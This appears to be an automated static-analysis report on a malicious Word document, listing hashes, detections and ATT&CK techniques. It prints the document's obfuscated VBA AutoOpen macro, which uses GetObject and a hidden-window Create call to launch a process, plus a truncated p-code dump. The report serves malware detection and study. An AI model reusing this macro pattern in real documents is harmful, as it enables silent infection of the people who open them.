Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e14ecab2293d76e2…

MALICIOUS

Office (OLE)

144.5 KB Created: 2019-03-19 19:21:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: b8ca9e186d1913be0572ab228d8dad35 SHA-1: 0ec314fd1020a4da14d741997d82fc1afa412e9e SHA-256: e14ecab2293d76e204d99beb52ea144bb17a3c1ab3707371ff245cd48eb80bcd
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. The macro utilizes the GetObject function, a known technique for executing embedded objects or code, indicating an attempt to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Malware.Drvb-6902289-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Drvb-6902289-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11466 bytes
SHA-256: b4660fcc8bb98aca4999452c0c80e7d127b710164e45be324dbe8b6b17531689
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "rXDoUA1D"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WZA_U1B"
Attribute VB_Base = "0{75E9A92E-ECF1-4CCF-AF6C-5F39DBCAA415}{5478F83B-268A-4049-9EB6-E3BE4B2695D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAAcAZ"
Sub autoopen()
On Error Resume Next
   If jwQX_AQ = bQAAUAXQ Then
wBGXc1 = 70048900 - ChrB(470836093 * Round(414266693) + Q11Ux1 - ChrB(wxAAAAAA)) / w11QA1Bc / Rnd(32834712 / VXDQ_X_Q * SpBb / ChrW(666234281 * CBool(678345324) / 441023156 + CStr(skADAoCG))) / 243962631 * Oct(FcQUxAx)
End If
   If E4UADQ = ak1QDxA Then
A4AAXUD = 181341305 - ChrB(2559126 * Round(651620675) + WUQAkw - ChrB(ABkA1oGQ)) / nAxkAUo / Rnd(663640487 / QDDk4A * SpBb / ChrW(86560935 * CBool(722992906) / 766325832 + CStr(qBUZ_Z))) / 639759154 * Oct(k1AAAA)
End If
Set TXABkB = GetObject(WZA_U1B.wAAXcA)
   If lABABAXA = DAZABX Then
lQ1AAAAZ = 261543561 - ChrB(776236418 * Round(742841960) + SZAQQQU - ChrB(OBZAwQ4Q)) / hAo_4GA / Rnd(859834665 / ZUGABUA * SpBb / ChrW(613997888 * CBool(628780582) / 97799350 + CStr(pCZ_B1Z))) / 286060895 * Oct(VA_XZx1k)
End If
   If wkAZQBXG = kQwcAx Then
FAUAAGXA = 692173888 - ChrB(882530444 * Round(261562846) + WwA_Uc - ChrB(WUAABA)) / KBcw_BZ / Rnd(194635374 / oAUA1UZ * SpBb / ChrW(913345409 * CBool(269177192) / 335333058 + CStr(SAADGAA))) / 409932476 * Oct(NAZA1XA4)
End If
   If wAZA_o = z1CGAo Then
YwDBkDDo = 565046529 - ChrB(982937593 * Round(827222769) + vADX__ - ChrB(kwA4BUUc)) / P4AADGA / Rnd(908708001 / fAZAGkDA * SpBb / ChrW(569750413 * CBool(465100729) / 963190173 + CStr(tQc4A1))) / 379682012 * Oct(S4QA1A1U)
End If
TXABkB.ShowWindow = 709285 - 709285
   If HkAQ1A = qQcc4Q Then
wAQA1X = 707896374 - ChrB(949739080 * Round(402376951) + uA1AACoA - ChrB(XZABUAck)) / Co1DDA / Rnd(621640367 / VwUGAQDQ * SpBb / ChrW(104621335 * CBool(720898872) / 57388389 + CStr(QUZAx_))) / 585106962 * Oct(rABAx_wA)
End If
   If fQDAGCZ = q1BAAUC Then
cUXDAA_ = 883231790 - ChrB(228047737 * Round(55639862) + ckBA4Aoc - ChrB(vAAAX1)) / nAAC__AA / Rnd(973477493 / pA_DoAX1 * SpBb / ChrW(993290355 * CBool(177148998) / 637207538 + CStr(KAQDDQ))) / 736677806 * Oct(N1UABA)
End If
GetObject(WZA_U1B.nAAA_x).Create% EUxQU_A + WZA_U1B.PABZAxAD + AxAAkBAQ + WZA_U1B.V_AAkAZ + vAXAAA_A + WZA_U1B.dAZU_Ao + jQXBAQD, BA4UxAA, TXABkB, IAxA4AA
   If ECAU4QA = JAwBDA Then
IX1o1DQA = 437120822 - ChrB(346753572 * Round(246870008) + OUAAGAo - ChrB(UZwAxAU)) / rDGAUA / Rnd(708072242 / JAAXDAoA * SpBb / ChrW(448745315 * CBool(68302440) / 232509212 + CStr(ZCUQQGBA))) / 796841784 * Oct(FA_AQxU4)
End If
   If jBUABCZA = zA4UDw4 Then
DxAAD4 = 120193573 - ChrB(246416607 * Round(456916623) + R_A1oZCA - ChrB(uoDGAA_)) / Zo4A1oox / Rnd(350564299 / jxkDAQx * SpBb / ChrW(282469471 * CBool(826474509) / 879884602 + CStr(BCXAUAXU))) / 653008359 * Oct(hxAQ4Ax)
End If
   If ix1GoDA = no1BADQ1 Then
PwQBoCA = 803746356 - ChrB(302626175 * Round(972335703) + SAAocZAQ - ChrB(oCAAAUx)) / nBAADk / Rnd(146735218 / l1AAGoZC * SpBb / ChrW(812377195 * CBool(386771033) / 99860431 + CStr(GBG_BGA))) / 318334200 * Oct(AoAAABGA)
End If
End Sub

' Processing file: /opt/analyzer/scan_staging/fb9c4fe615a84730ab0b58b3e4e256ea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/rXDoUA1D - 1106 bytes
' Macros/VBA/WZA_U1B - 1158 bytes
' Macros/VBA/wAAcAZ - 5100 bytes
' Line #0:
' 	FuncDefn (Sub wAAcAZ())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld jwQX_AQ 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LitDI4 0xDC84 0x042C 
' 	LitDI4 0x637D 0x1C10 
' 	LitDI4 0x3545 0x18B1 
' 	ArgsLd Round 0x0001 
' 	Mul 
' 	Ld wBGXc1 
' 	Add 
' 	Ld Q11Ux1 
' 	ArgsL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.